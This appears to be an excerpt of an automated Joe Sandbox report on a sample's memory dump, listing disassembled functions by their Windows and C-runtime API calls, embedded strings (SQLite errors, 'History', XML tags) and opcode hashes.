                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                      • String ID:
                                                                                      • API String ID: 4131324427-0
                                                                                      • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                      • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                      • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                      • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                      APIs
                                                                                      • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                      • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                      • free.MSVCRT ref: 0041822B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: PathTemp$free
                                                                                      • String ID: %s\etilqs_$etilqs_
                                                                                      • API String ID: 924794160-1420421710
                                                                                      • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                      • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                      • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                      • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 0040FDD5
                                                                                        • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                        • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                        • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                      • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                      • String ID: <%s>%s</%s>$</item>$<item>
                                                                                      • API String ID: 1775345501-2769808009
                                                                                      • Opcode ID: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                                                      • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                      • Opcode Fuzzy Hash: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                                                      • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                      APIs
                                                                                      • wcscpy.MSVCRT ref: 0041477F
                                                                                      • wcscpy.MSVCRT ref: 0041479A
                                                                                      • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General,?,00000000,00000001), ref: 004147C1
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: wcscpy$CloseCreateFileHandle
                                                                                      • String ID: General
                                                                                      • API String ID: 999786162-26480598
                                                                                      • Opcode ID: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                                                      • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                      • Opcode Fuzzy Hash: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                                                      • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                                      • _snwprintf.MSVCRT ref: 0040977D
                                                                                      • MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLastMessage_snwprintf
                                                                                      • String ID: Error$Error %d: %s
                                                                                      • API String ID: 313946961-1552265934
                                                                                      • Opcode ID: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                                                      • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                      • Opcode Fuzzy Hash: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                                                      • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: foreign key constraint failed$new$oid$old
                                                                                      • API String ID: 0-1953309616
                                                                                      • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                      • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                      • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                      • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                      APIs
                                                                                      Strings
                                                                                      • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                      • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                      • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpy
                                                                                      • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                      • API String ID: 3510742995-272990098
                                                                                      • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                      • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                      • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                      • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 0044A6EB
                                                                                      • memset.MSVCRT ref: 0044A6FB
                                                                                      • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                      • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpymemset
                                                                                      • String ID: gj
                                                                                      • API String ID: 1297977491-4203073231
                                                                                      • Opcode ID: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                                                      • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                      • Opcode Fuzzy Hash: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                                                      • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                      APIs
                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E961
                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E974
                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E987
                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E99A
                                                                                      • free.MSVCRT ref: 0040E9D3
                                                                                        • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ??3@$free
                                                                                      • String ID:
                                                                                      • API String ID: 2241099983-0
                                                                                      • Opcode ID: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                                                                      • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                      • Opcode Fuzzy Hash: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                                                                      • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                      APIs
                                                                                      • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                      • malloc.MSVCRT ref: 004174BD
                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                      • free.MSVCRT ref: 004174E4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                      • String ID:
                                                                                      • API String ID: 4053608372-0
                                                                                      • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                      • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                      • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                      • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                      APIs
                                                                                      • GetParent.USER32(?), ref: 0040D453
                                                                                      • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                      • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                      • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Rect$ClientParentPoints
                                                                                      • String ID:
                                                                                      • API String ID: 4247780290-0
                                                                                      • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                      • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                      • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                      • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                      APIs
                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                      • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                      • memset.MSVCRT ref: 004450CD
                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                        • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                        • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                        • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                        • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                      • String ID:
                                                                                      • API String ID: 1471605966-0
                                                                                      • Opcode ID: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                                                      • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                      • Opcode Fuzzy Hash: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                                                      • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                      APIs
                                                                                      • wcscpy.MSVCRT ref: 0044475F
                                                                                      • wcscat.MSVCRT ref: 0044476E
                                                                                      • wcscat.MSVCRT ref: 0044477F
                                                                                      • wcscat.MSVCRT ref: 0044478E
                                                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                        • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                                        • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                      • String ID: \StringFileInfo\
                                                                                      • API String ID: 102104167-2245444037
                                                                                      • Opcode ID: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                                                      • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                      • Opcode Fuzzy Hash: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                                                      • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                      APIs
                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ??3@
                                                                                      • String ID:
                                                                                      • API String ID: 613200358-0
                                                                                      • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                      • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                      • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                      • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                      APIs
                                                                                      • GetSystemMetrics.USER32(00000000), ref: 00401990
                                                                                      • GetSystemMetrics.USER32(00000001), ref: 0040199B
                                                                                      • SetWindowPlacement.USER32(00000000,?), ref: 004019CC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: MetricsSystem$PlacementWindow
                                                                                      • String ID: AE
                                                                                      • API String ID: 3548547718-685266089
                                                                                      • Opcode ID: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                                                      • Instruction ID: bc47655bc3d2af3ddac3cbb2ac08b89d1fd66a09df9f10e9f6ff2044f470f5ca
                                                                                      • Opcode Fuzzy Hash: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                                                      • Instruction Fuzzy Hash: 4C11AC719002099BCF20CF5EC8987EE77B5BF41308F15017ADC90BB292D670A841CB64
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: _memicmpwcslen
                                                                                      • String ID: @@@@$History
                                                                                      • API String ID: 1872909662-685208920
                                                                                      • Opcode ID: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                                                                      • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                      • Opcode Fuzzy Hash: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                                                                      • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 004100FB
                                                                                      • memset.MSVCRT ref: 00410112
                                                                                        • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                        • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                      • _snwprintf.MSVCRT ref: 00410141
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                      • String ID: </%s>
                                                                                      • API String ID: 3400436232-259020660
                                                                                      • Opcode ID: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                                                      • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                      • Opcode Fuzzy Hash: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                                                      • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
